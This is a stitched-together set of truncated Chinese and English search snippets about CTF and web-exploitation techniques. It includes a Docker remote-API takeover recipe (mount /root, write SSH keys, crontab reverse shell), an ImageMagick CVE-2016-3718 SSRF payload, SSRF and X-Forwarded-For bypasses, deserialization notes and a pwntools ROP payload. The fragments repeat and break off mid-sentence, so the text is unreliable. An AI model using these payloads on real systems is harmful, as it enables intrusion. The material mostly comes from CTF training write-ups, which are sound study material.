Remote api 未授權訪問 開一個 container,掛載 /root/,寫 ssh key 寫crontab彈 shell docker -H tcp://ip xxxx ImageMagick - CVE-2016-3718 可以發送 HTTP 或 FTP request payload: ssrf.mvg push graphic-context viewbox 0 0 640 480 fill 'url(http://example.com/)' pop graphic-context $ ...
Kernel address space layout randomization (KASLR):就像我们的ASLR,随机化了每次系统启动时内核加载地址。可以由qemu参数-append中添加kaslr或nokaslr开启或关闭 Supervisor mode execution protection (SMEP):开启后,陷入内核后将无法执行用户段命令。这个由CR4寄存器的20th bit决定是否开启,我们在启动参数中在-append中...
if flask.request.remote_addr != '127.0.0.1': return '🥺' return app.flag 一道典型的ssrf题目,思路也非常清晰,访问内网的admin_status路由即可获得flag,但这道题用remote_addr要求ip不能为127.0.0.1 ,但其实ip的表示法有很多,我们可以使用八进制的ip来bypass 推荐阅读文章:http://www.manongjc.c...
X-Client-IP X-Real-IP X-Remote-IP X-Remote-Addr X-Host ... 各種繞 Limit (e.g. Rate limit bypass) Heroku feature https://jetmind.github.io/2016/03/31/heroku-forwarded.html 同時送多個 X-Forwarded-For header,可以讓真實 IP 被包在 IP list 中間 (Spoofing) Example: angstromCTF 2021 ...
if(!is_dir($temp_dir)){ mkdir($temp_dir); } //首先进行后缀的校验,把刚刚拿到的,最后一个.后面的字符串和这里的zip、jpg、gif、png进行对比校验 if(in_array($ext, array('zip', 'jpg', 'gif', 'png'))){ //使用白名单校验,只允许zip、jip、gif、png 上传 ...
简单来说,rhino链最终触发的地方其实是method.invoke(),也就是可以触发任何的方法,但是这里两个命令执行类Runtime和ProcessBuilder都被过滤掉了,于是开始考虑二次反序列化,因为javax.management.remote.rmi.rmiconnector事实上是没有被过滤的, RMIConnector二次反序列化 ...
elf = ELF(elf_path, checksec = False) p = elf.process() else: p = remote(ip, port) run(0) rdi = 0x000000000040120b payload = 'a'*144+p64(0)+p64(rdi)+p64(0x403408)+p64(0x401030) p.send(payload) p.interactive() CTF...
CTF靶场训练之攻防世界 php_rce。 charis 160775围观2021-05-19 『CTF』从两道题目看 RSA 算法原创 Web安全 日期:2021-05-06作者:宸极实验室-Jgk01介绍:早年两道RSA题目,考古发现比较有意思,大家感兴趣的可以先不看解题思路自己做一下... KeePass
CTF靶场训练之攻防世界 php_rce。 charis 161334围观2021-05-19 『CTF』从两道题目看 RSA 算法原创 Web安全 日期:2021-05-06作者:宸极实验室-Jgk01介绍:早年两道RSA题目,考古发现比较有意思,大家感兴趣的可以先不看解题思路自己做一下... KeePass
这里有一个非预期,Flask 的 proxy_fix 代码中解析 XFF 头的时候不是直接按逗号分割的,而是会把引号包裹的当成一个整体处理。这就导致可以利用 IPv6 的 scope 来绕过X-Forwarded-For: ::1%" 第二步绕过SSRF检查也有两个解法,一个是使用IPv4-mapped IPv6 address来绕过:http://[::FFFF:172.18.19.3]:8000...